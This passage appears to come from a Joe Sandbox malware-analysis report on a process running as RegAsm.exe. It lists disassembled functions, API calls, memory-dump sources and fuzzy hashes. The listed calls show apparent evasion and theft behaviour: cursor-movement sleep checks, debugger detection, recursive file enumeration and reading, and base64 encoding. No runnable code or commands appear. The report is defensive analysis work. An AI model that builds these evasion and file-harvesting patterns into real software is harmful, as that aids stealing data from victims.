Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 6519866cfe50f77d41cc2b2ac99f006488dbfa2511163be475034921ca82e4a6
Instruction ID: 9f8c184395dc94b50b95cd11e93133fea5b0a4db279a133621157703629664ad
Opcode Fuzzy Hash: 6519866cfe50f77d41cc2b2ac99f006488dbfa2511163be475034921ca82e4a6
Instruction Fuzzy Hash: 5B91B1706087418FCB24CF25C49479FB7E1AFCA358F50892DE59A87B91EB30E549CB92

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 6C079E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C079F3D
__aulldiv.LIBCMT ref: 6C079F77
__aullrem.LIBCMT ref: 6C079F8C
__aulldiv.LIBCMT ref: 6C07A023

Strings

NaN, xrefs: 6C079EAB
-Infinity, xrefs: 6C079E60, 6C079E7B

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: efdde38ed44f50b00c5e86a47485630a202a9d868036dd056e5ad0b7646ba5d5
Instruction ID: 1834cd36262d91b8b92d8226d1bd05ae1f01484f8db3c02983dace45ea7bdd83
Opcode Fuzzy Hash: efdde38ed44f50b00c5e86a47485630a202a9d868036dd056e5ad0b7646ba5d5
Instruction Fuzzy Hash: 25C1B071E043188BDB28CFA8C85079EB7F6FB88714F644529D406ABB80D770E949CBA5

Function 0040B93F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
FindClose.KERNEL32(?), ref: 0040BF05

Strings

\*.*, xrefs: 0040B965

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2390431556-1173974218
Opcode ID: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction ID: 085151aa20985cc1c24b900562e2038c57bb153a1e06efcc5d93ab1db404d891
Opcode Fuzzy Hash: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction Fuzzy Hash: 34E1DA7194012D9BCF21FB26DD4AACDB375AF44309F4100E6A508B71A1DB79AFC98F98

Function 6C07B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C029B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C07B92D), ref: 6C029BC8
Part of subcall function 6C029B80: __Init_thread_footer.LIBCMT ref: 6C029BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0203D4,?), ref: 6C07B955
NtQueryVirtualMemory.NTDLL ref: 6C07B9A5
NtQueryVirtualMemory.NTDLL ref: 6C07BA20
RtlNtStatusToDosError.NTDLL ref: 6C07BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C07BA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C07BA86

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: a49acb8336c84eca4181fac55cae548920c5724fa833a29b0d55562d66c5e99d
Instruction ID: 61f419d05969f5b5f3e1fe5302625fa35511db8e63346e11d3330468d1f5412d
Opcode Fuzzy Hash: a49acb8336c84eca4181fac55cae548920c5724fa833a29b0d55562d66c5e99d
Instruction Fuzzy Hash: 1B513C71E01219EFDF28DFA8D980BDDB7F6AB88318F144129E911B7644DB30AD458BA4

Function 0042B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148

Strings

ACP, xrefs: 0042B0DB
OCP, xrefs: 0042B0EC

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1

Function 0041D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D44E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
TerminateProcess.KERNEL32(00000000), ref: 0041D491

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E

Function 6C08545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C088A4B

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: e30c6e5b235925882aca18b37b8328382a7032ef863139c9f5cf9d607bd5597a
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: C1B1E776A0221A8FDF14CF68CC91B9DB7F2EF85314F1442A9C549EB785D730A985CB90

Function 6C08542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C0888F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C08925C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 108f8c53740c5832e8706055296be8eabf51ef1f2d1c6d532758681466f0f4a7
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 4BB1C576A0620ACBDF14CF58C881BADB7F6AF84314F144279C549EB785D730A999CB90

Function 6C0850C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C088E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C08925C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 8b91d7154502a95c712a6f606b913366f22f739458f59ea626243c0c0a4b46a6
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 07A1E676A0111A8FDF14CF68CC80B9DB7F6AF85314F1442BAC949EB785D730A999CB90

Function 6C0677A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C067A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C067A93

Part of subcall function 6C035C50: GetTickCount64.KERNEL32 ref: 6C035D40
Part of subcall function 6C035C50: EnterCriticalSection.KERNEL32(6C09F688), ref: 6C035D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C067AA1

Part of subcall function 6C035C50: __aulldiv.LIBCMT ref: 6C035DB4
Part of subcall function 6C035C50: LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C035DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C067B31

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: d1702866ff7960536389c1730c6783ed0cc6ecac77c1c0505ba6a662294e9f16
Instruction ID: da3b28a683ee84391f71e1f9b3ee7d1e3a92e248255ea098f2a64eef0b6fd1a4
Opcode Fuzzy Hash: d1702866ff7960536389c1730c6783ed0cc6ecac77c1c0505ba6a662294e9f16
Instruction Fuzzy Hash: 8FB17A356083818BCB14CF2AC45079FB7E2BFC9318F154A1DE99567B91DB70E90ACB82

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24

Function 6C07B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C07B720
RtlNtStatusToDosError.NTDLL ref: 6C07B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C04FE3F,00000000,00000000,?,?,00000000,?,6C04FE3F), ref: 6C07B760

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 23f01220487b39985d8f7c242fe38e048d58e867a7befd359421cad6a91639ea
Instruction ID: 9eea5ebc708b60b7bb710857f17a1a502ed2ea7ccf337fcc710789dae63aab7a
Opcode Fuzzy Hash: 23f01220487b39985d8f7c242fe38e048d58e867a7befd359421cad6a91639ea
Instruction Fuzzy Hash: C7F0C2B0A0520CAEEF259AA1CCC4BEF77FDAB0471AF509239E511665C0D778A6CCC674

Function 6C07B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0203D4,?), ref: 6C07B955
NtQueryVirtualMemory.NTDLL ref: 6C07B9A5

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 4b6f80593054e040a972204026b26764580103b388f25c8b4cb04a83ef69922a
Instruction ID: 39e44eec49a77f5d475a5ec30800343459542a602b3670f846153dfa563540df
Opcode Fuzzy Hash: 4b6f80593054e040a972204026b26764580103b388f25c8b4cb04a83ef69922a
